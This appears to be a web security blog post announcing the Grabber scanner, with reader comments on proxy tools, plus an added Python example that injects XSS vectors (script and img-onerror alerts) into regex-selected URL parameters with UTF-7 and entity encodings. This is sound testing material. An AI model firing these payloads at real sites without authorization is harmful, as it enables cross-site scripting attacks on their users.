web application security lab

Grabber Released

Romain Gaucher published a pretty interesting tool this weekend called Grabber. Grabber is written in Python (a Windows .exe build is also available) and exercises some of the attack vectors from the XSS Cheat Sheet, among others. I’m really excited to see this sort of development.

You know what I’d really like, though? I’ve been dying to get my hands on something like Burp proxy (preferably tied into it) that lets me auto-inject vectors based on a series of regexes, and that can apply a number of the obfuscation functions programmatically, such as automatically re-encoding an HTML payload as UTF-7. I know the FishNetSecurity folks were working on something like this (and holy crap was it cool), but I really think it needs to be built into a proxy to be effective for manual testing.
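
The mutation engine such a proxy would need, written as an added example in Python (Grabber’s language). This is not Grabber’s code and not anything from Burp or the FishNetSecurity project; the parameter-name regexes, the vector list, the target URL and the sample response bodies are all constructed for the example. It does the two things asked for above: picks parameters by regex and injects each vector, and applies encoding transforms (UTF-7 and numeric HTML entities) to the vector before injection.

```python
"""Regex-driven XSS vector injection with pluggable encodings.

Added example, not Grabber's code and not part of any proxy named on the
page.  Parameter rules, vectors, the sample URL and the sample response
bodies are constructed.
"""
import base64
import html
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Characters worth hiding from a filter that looks for the literal bytes.
UTF7_TARGETS = set('<>"\'')


def utf7_encode_char(ch):
    """UTF-7 shift sequence for one character: '+' + base64(UTF-16BE) + '-'."""
    b64 = base64.b64encode(ch.encode("utf-16-be")).decode("ascii").rstrip("=")
    return "+" + b64 + "-"


def utf7_xss(payload):
    """Re-encode only the markup-significant characters of an HTML payload as
    UTF-7 shift sequences and leave the rest readable (the classic
    '+ADw-script+AD4-' form).  Done by hand rather than with Python's 'utf-7'
    codec, which may emit '<' and '>' unencoded because RFC 2152 permits it."""
    return "".join(utf7_encode_char(c) if c in UTF7_TARGETS else c for c in payload)


def html_entity_encode(payload):
    """Decimal numeric entities for every non-alphanumeric character."""
    return "".join(c if c.isalnum() else "&#%d;" % ord(c) for c in payload)


VECTORS = [
    "<script>alert(1)</script>",
    "\"><img src=x onerror=alert(1)>",
]

TRANSFORMS = {
    "raw": lambda s: s,
    "utf7": utf7_xss,
    "entities": html_entity_encode,
}

# Which parameters to attack, chosen by name (constructed rules).
PARAM_RULES = [
    re.compile(r"^(q|s|search|query|name|msg|comment)$", re.I),
    re.compile(r"(url|redir|return|next)", re.I),
]


def mutate_url(url, rules=PARAM_RULES, vectors=VECTORS, transforms=TRANSFORMS):
    """Return (param, transform, mutated_url) for every matching parameter,
    vector and transform.  Only one parameter changes per request so that a
    reflection in the response can be attributed to it."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    out = []
    for i, (name, _) in enumerate(params):
        if not any(r.search(name) for r in rules):
            continue
        for vector in vectors:
            for tname, fn in transforms.items():
                mutated = list(params)
                mutated[i] = (name, fn(vector))
                # urlencode percent-encodes '+' as %2B; sent literally, the
                # server would turn the UTF-7 shift marker into a space.
                query = urlencode(mutated)
                out.append((name, tname, urlunsplit(parts._replace(query=query))))
    return out


def classify_reflection(body, vector):
    """'unescaped' if the vector came back verbatim, 'escaped' if only its
    HTML-escaped form is present, 'none' otherwise."""
    if vector in body:
        return "unescaped"
    if html.escape(vector, quote=True) in body:
        return "escaped"
    return "none"


if __name__ == "__main__":
    URL = "http://target.example/search?q=hello&page=2"  # constructed
    for name, tname, u in mutate_url(URL):
        print(name, tname, u)
    # Constructed response from an app that escaped nothing.
    body = "<p>Results for: +ADw-script+AD4-alert(1)+ADw-/script+AD4-</p>"
    print(classify_reflection(body, utf7_xss(VECTORS[0])))
```

A caveat on reading the results: an `unescaped` reflection of the UTF-7 form only matters if the response carries no explicit charset and the victim’s browser is willing to sniff UTF-7, which current browsers no longer do; the raw and entity-encoded forms are the ones to chase first. Adding a transform is one line in `TRANSFORMS`, which is the point of keeping the encodings separate from the injection loop.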

Anyway, cool stuff, and I hope to see more tools produced for this type of testing. The more of this we can automate, the faster and more accurate manual testing gets.

3 Responses to “Grabber Released”

  1. ntp Says:

    When I do manual testing, I usually use burpproxy because it is fast (compared to other proxy tools). Burp suite has intruder, which allows for some automatic/manual combined testing, but I usually work with the proxy-only version of burp.

    XSS Assistant (Whiteacid’s Greasemonkey script) was great for manual testing, too. A combination of burpproxy and xss-assistant works great - find where some injection might work and then copy it manually into burp (and manually change the encodings accepted as well). I know that’s testing twice, so I would like to see this functionality in the proxy tool itself as well.

    Besides speed, burp is just the best-of-class tool out there, especially for manual web application security assessment. You could combine manual and automatic methods such as described in this book:
    http://safari5.bvdep.com/0596007949
    where the author builds a log parser for burp here
    http://safari5.bvdep.com/0596007949/networkst-CHP-8-SECT-3
    and uses it as input for his simple scanner
    http://safari5.bvdep.com/0596007949/networkst-CHP-8-SECT-5
    as well as his extended scanner
    http://safari5.bvdep.com/0596007949/networkst-CHP-9-SECT-1#X2ludGVybmFsX1NlY3Rpb25Db250ZW50P3htbGlkPTA1OTYwMDc5NDkvbmV0d29ya3N0LUNIUC05LVNFQ1QtMg==

    I use a similar method with his log parse script and Unix shell + curl (he uses LWP and perl). Some of these open-source scanners are getting pretty good. I’ve only used WebInspect on the commercial front, and didn’t like it (or at least didn’t like the price).

  2. nEUrOO Says:

    I have to say that Grabber is not really for testing your big web apps. It turns out to be very slow with thousands of URLs in the spider :/

    For me, the most important part of Grabber is the hybrid analysis module. Actually, this is what I think would be the most interesting for web developers.

    But it also needs lots of development in other areas for its usability.

  3. dre Says:

    From recently reading ‘Hunting Security Bugs’ from Microsoft Press, I found out about two web proxy tools that I think you should know about.

    The first, Web Proxy Editor, is included in the companion site for the book.
    http://www.microsoft.com/mspress/companion/0-7356-2187-X/
    It does support inline encoding tools for all different encoding types.

    The other is Charles Web Debugging Proxy.
    http://www.xk72.com/charles/
    It seems to have some great features including the encoding support as well as tons of other features that I was really impressed with (e.g. AJAX debugging by viewing XHR calls).
